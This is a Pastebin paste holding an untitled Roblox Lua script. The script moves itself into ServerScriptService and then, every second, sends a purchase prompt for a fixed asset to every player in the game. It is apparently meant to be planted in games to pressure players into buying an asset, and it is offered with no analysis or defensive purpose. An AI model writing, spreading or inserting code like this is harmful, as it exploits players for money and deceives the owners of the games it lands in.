Advertisement
colddddda

Untitled

Jun 2nd, 2016
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.20 KB | None | 0 0
  1. script.Parent = game.ServerScriptService
  2. assetId= 123008745
  3. ms=game:service'MarketplaceService'
  4. while wait(1) do
  5. for _,v in pairs(game.Players:children'') do
  6. ms:PromptPurchase(v, assetId)
  7. end
  8. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement